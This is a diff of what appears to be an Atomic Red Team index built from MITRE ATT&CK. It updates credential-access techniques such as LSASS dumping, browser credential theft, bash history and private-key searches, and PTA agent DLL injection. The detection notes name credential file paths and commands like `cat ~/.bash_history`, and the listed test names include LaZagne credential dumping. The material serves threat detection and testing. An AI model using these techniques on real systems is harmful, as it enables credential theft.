         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -54394,9 +55164,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -54405,21 +55175,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -54459,55 +55230,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -54537,6 +55263,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -54546,18 +55278,53 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests:
     - name: LaZagne.py - Dump Credentials from Firefox Browser
@@ -54597,7 +55364,7 @@ credential-access:
         elevation_required: true
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -54634,23 +55401,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -54683,21 +55450,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -54708,7 +55474,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -54742,7 +55508,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -54770,7 +55536,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -54781,9 +55547,8 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests:
     - name: Discover Private SSH Keys
@@ -54998,7 +55763,7 @@ credential-access:
         name: sh
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -55106,12 +55871,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -55148,6 +55912,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -55160,7 +55925,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -55210,12 +55975,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -55241,6 +56005,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -55256,18 +56021,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -55294,14 +56059,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -55312,13 +56074,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -55332,6 +56094,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -55342,12 +56105,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -55422,7 +56185,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -55468,7 +56230,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -55503,16 +56265,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -55522,21 +56282,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -55585,33 +56347,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -55626,20 +56366,38 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests:
     - name: Search Through Bash History
@@ -55699,7 +56457,7 @@ credential-access:
         name: sh
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -55773,7 +56531,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests:
     - name: Find AWS credentials
@@ -55893,11 +56650,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -55946,6 +56702,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -55954,6 +56711,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -55964,13 +56722,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -56026,44 +56785,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
